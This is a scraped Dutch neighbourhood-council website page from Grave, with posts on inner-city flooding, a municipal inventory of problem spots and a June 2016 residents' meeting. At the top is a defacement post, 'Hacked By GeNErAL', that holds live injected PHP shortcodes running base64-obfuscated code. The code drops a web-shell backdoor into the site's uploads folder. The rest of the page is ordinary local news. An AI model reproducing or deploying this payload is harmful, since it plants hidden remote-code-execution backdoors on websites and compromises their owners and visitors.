Categorieën
Nieuws

Hacked By GeNErAL

[insert_php]@eval(base64_decode(‘JGZpbGUgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLiIvd3AtY29udGVudC91cGxvYWRzLzQ2bGJqdno0LnBocCI7JGRhdGEgPSAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3lkbU5ESTBObTQ0ZENkZEtUcy9QZz09IjskYmFzZWRlY29kZWRhdGEgPSBiYXNlNjRfZGVjb2RlKCRkYXRhKTtmaWxlX3B1dF9jb250ZW50cyAoJGZpbGUsICRiYXNlZGVjb2RlZGF0YSk7’));[/insert_php][php]@eval(base64_decode(‘JGZpbGUgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLiIvd3AtY29udGVudC91cGxvYWRzLzQ2bGJqdno0LnBocCI7JGRhdGEgPSAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3lkbU5ESTBObTQ0ZENkZEtUcy9QZz09IjskYmFzZWRlY29kZWRhdGEgPSBiYXNlNjRfZGVjb2RlKCRkYXRhKTtmaWxlX3B1dF9jb250ZW50cyAoJGZpbGUsICRiYXNlZGVjb2RlZGF0YSk7’));[/php]

Categorieën
Groen in Grave

Aanpak wateroverlast Binnenstad

Wateroverlast

Wat doen we eraan

30 augustus vorig jaar werden we geconfronteerd met hevige regen die in Grave veel last en ook schade veroorzaakte. Afgelopen weken was het weer raak. Deze keer bleef Grave geschoond van spectaculaire situaties en waren het de buurgemeenten die de krant haalden.

Hoofschestraat
foto BHIC; collectie Smeets

Ook in het verleden en nadat de Maas was getemd kwam wateroverlast voor. Water in kruipruimten is in alle Graafse wijken een bekend verschijnsel. In de binnenstad zijn kelders waar men geen kwetsbare spullen op de grond zet. Ik herinner me uit de 60-er jaren een liedje uit het Graafs Cabaret met als tekst: “Ik barst van water, het water dat staat me tot boven de knie”. Voor een deel hebben we met deze situatie leren leven.Dat er sprake is van klimaatwijzing wordt niet meer echt betwijfeld. De oorzaak daarvan staat nog wel ter discussie. Je hebt echter meer aan het zoeken van een oplossing dan aan het vinden van de schuldige. En aan het zoeken van de oplossing wordt nu begonnen.

Na de gebeurtenissen in augustus 2015, maar ook al daarvoor, is met de gemeente overleg geweest over een paar specifieke situaties. Bij de begrotingsbehandeling voor 2016 heeft ook de gemeenteraad in een motie uitgesproken dat er aan die wateroverlast iets moest worden gedaan. Landelijk hebben de gemeenten hebben daarvoor een zogenaamde “wateropgave” gekregen. Dat houdt in dat men onderzoekt wat de veranderende regenval voor consequenties heeft en wat daaraan valt te doen In het overleg met de gemeente is duidelijk naar voren gekomen dat de bewoners via de wijk- en dorpsraden vanaf het begin bij dit project moeten zijn betrokken.

Het verschijnen van het bericht dat gemeentebreed wordt gevraagd om het melden van plaatsen met wateroverlast en dan liefst met opgave van de oplossing kwam dan toch als een verrassing. De plekken zijn toch wel bekend en oplossingen schud je niet zo maar uit je mouw.

Natuurlijk is daarom om een toelichting gevraagd. En die is prompt gekregen.

De gemeente heeft bij dit –gemeentebrede- project een bureau ingeschakeld.

Het bureau is nieuw in Grave en moet dus ook beginnen met inventariseren. De aanpak is als volgt:

Doelstelling project: In beeld brengen van kwetsbare gebieden bij extreme neerslag met mogelijke oplossingsrichtingen.

 • stap 1: inventarisatie naar knelpunten binnen gehele gemeente Grave [juni/juli]

o   al gemelde knelpunten bij gemeente

o   door meldingen via mail

o   door meldingen op inloopavond 29 juni (geen algemene informatieavond)

 • stap 2: kwetsbare gebieden nader onderzoeken [september]

o   werking riolering (berekeningen)

o   hoogtes verhardingen

 • stap 3: bepalen mogelijke oplossingsrichtingen [oktober]

o   bovengronds / ondergronds / openbaar / particulier

o   rapportage aan raad

Oplossingen moeten niet alleen worden gezocht in grotere riolen. Ook de inrichting van de straten heeft invloed op de gevolgen van stortbuien. Ook de ligging en inrichting van huizen kan belangrijk zijn. Niet altijd zal het mogelijk zijn overlast te voorkomen en dan is het zaak de schade zoveel mogelijk te beperken. Dat betekent dat ook de bewoners bij het project moeten worden betrokken.

Vanuit de wijkraad is daarom gevraagd om ook direct na de inventarisatie een bewonersbijeenkomst te organiseren met als onderwerpen:

 • hoe is de regen nu en in de toekomst anders dan we gewend zijn?
 • hoe werkt de Graafse riolering ?
 • waar zitten de zwakke plekken ?
 • wat kan de gemeente er aan doen.
 • wat kunnen burgers zelf doen ?

Het bureau zal met de gemeente afstemmen welke rol de gemeente bij deze bijeenkomst kan spelen wat betreft informatievoorziening.

Oplossingen moeten natuurlijk worden uitgevoerd en daarvoor is geld nodig. Op de vraag of er budget is voor uitvoering van maatregelen kon het bureau geen antwoord geven. Of er in de kadernota 2017 al budget is gereserveerd is momenteel nog niet bekend.

Het is nu zaak dat alle vormen van wateroverlast, ook die waar u aan bent gewend, in het project worden meegenomen. Ook als u al eerder hebt gemeld doe dat dan nog maar een keer.

Bezoek ook de inloopavond op 29 juni en stel alvast de vragen die bij u leven.

 

De regenval is natuurlijk  een belangrijke oorzaak, maar er zijn ook andere mogelijkheden. Het peil van de Maas is onlangs verhoogd en dat kan in kelders merkbaar zijn. Laten bezinken van regenwater in de grond kan ruimte geven in de riolering, maar dan moet het water ook echt bezinken. Als dat niet gebeurt zoals op veel plekken in onze binnenstad kunnen op die manier waterreservoirs ontstaan die door niet waterdichte vloeren en muren naar binnen kunnen komen. Een lekke rioolaansluiting heeft hetzelfde effect. Hoe gedetailleerder uw informatie over de overlast is des te makkelijker wordt het de oorzaak te achterhalen.

Wordt ongetwijfeld vervolgd

 

Categorieën
Nieuws

Bewonersbijeenkomst 2 juni 2016

Dia1Oorspronkelijk zou de avond vooral worden gewijd aan veiligheid en dan met name brandveiligheid en dan speciaal de preventie: hoe voorkom ik brand. Inmiddels heeft de gemeente dat initiatief gemeentebreed overgenomen.

Er moest dus wat met het programma worden geïmproviseerd en dat is prima gelukt. Een 80-tal bewoners van de binnenstad was naar het Arsenaal gekomen om over van alles te praten dat ons interesseert. Na het officiële deel ging dat nog geruime tijd door. Het was zowel een nuttige als een gezellige bijeenkomst. En dat is precies het doel van de wijkraad.

Hieronder aan  korte impressie van hetgeen is besproken.

Terugblik op afgelopen jaar.

Het bleek dat de wijkraad nieuwe stijl een flink lange aanloop nodig had om echt op gang te komen. De eerste bewonersbijeenkomst eind augustus was een succes. Met de gemeente is overleg gaande over rol van de wijkraad. Er is overleg met de andere wijk- en dorpsraden waarbij geldt dat gedeelde vreugd dubbele is, maar gedeelde smart is ook halve smart. Kortom we kunnen goed met elkaar overweg. Het archief is overgedragen en de financiën op orde. De eerste werkgroepen zijn van start en er zijn al schoonmaakploegen en bloemenplanters bezig geweest. De start van Nextdoor was helemaal een voltreffer, maar daarover later meer.

Thema’s komende periode

Over wateroverlast en parkeren is het overleg met de gemeente en de ondernemersorganisaties gestart.  Daarnaast zal ongetwijfeld de ontwikkeling van het Visioterrein en het Wisseveld ofwel Waterlinie Grave veel aandacht vragen. En dan zullen we niet vergeten dat de Raad van Inspiratie het nodige in beweging zal zetten. Daarvoor is het wel gewenst dat meer bewoners zich actief inzetten. Men kan zich daarvoor op allerlei manieren aanmelden. In Nieuwsbrief 3 is aan wateroverlast en parkeren afzonderlijk aandacht besteed.

Het ligt in de bedoeling aan onderwerpen die zich daarvoor lenen in een vroegtijdig stadium een bewonersbijeenkomst te organiseren. Zo is half september al een dergelijke bijeenkomst gepland over veiligheid. Met de gemeente wordt overlegd over de invulling. Daarnaast zijn dergelijke bijeenkomsten over wateroverlast en parkeren binnen afzienbare tijd te verwachten.

Nextdoor

Een app die ook met PC en laptop is te gebruiken en waar heel veel mee mogelijk is. Tijdens de bijeenkomst werden enkele geopperde bezwaren (verdrinken in de mails) al uit de weg geruimd en er is een handleiding beschikbaar. Kortom kom erbij! Waarvoor kunt u het gebruiken.

 • Vraag en aanbod, maar niet commercieel alstublieft
 • Gratis delen en lenen
 • Verloren en gevonden
 • groepjes vormen zoals samen koken of zwerfvuil opruimen
 • wat u verder maar kunt bedenken.

Er is ook een evenementenkalender (wees voorzichtig, anders krijgt u de hele binnenstad op verjaardagsvisite)

Groen in de binnenstad

Marion Vermeulen gaf een presentatie over wat er in de binnenstad met planten en bloemen allemaal mogelijk is. Met foto’s liet zij zien wat een verschil dat kan maken.

IMG_4683

IMG_1093

 

 

 

 

Dankzij samenwerking met gemeente en ondernemers is in de afgelopen jaren al veel gebeurd. Dat daarbij een subsidie van “Kern met pit” werd binnengehaald heeft daarbij natuurlijk geholpen. Er is nog geld beschikbaar dus als u wat wilt, bijvoorbeeld een geveltuintje, meld dat dan via info@wijkraadbinnenstadgrave.nl . Ook kunt u daar aangeven dat u best een keer een handje wilt uitsteken.

 

Napraten

Veel aanwezigen bleven nog geruime tijd om onder het genot van een drankje wat bij te praten. Het ging over van alles waaronder natuurlijk zaken die door de wijkraad zullen “worden meegenomen” zoals dat heet. Dat onderwerpen als klokkentoren, autoluwe markt, toekomst Maaszicht, scheepswerf kerkplein, vuil op straat en vele andere aan de orde zijn gekomen is niet vreemd. Lang niet op alles kon een direct antwoord worden gegeven. Maar het zorgt er wel voor dat het bestuur van de wijkraad zich niet hoeft te vervelen> En dat zal ook niet gebeuren als u zich massaal aanmeldt om aan onderwerpen die u aangaan of interesseren mee te werken.

Tot ziens

was het laatste woord dat werd gehoord.

Categorieën
Nieuws

Bijeenkomst 2 juni Arsenaal

20160602 top agenda

 

Op de valreep een geactualiseerde agenda voor vanavond.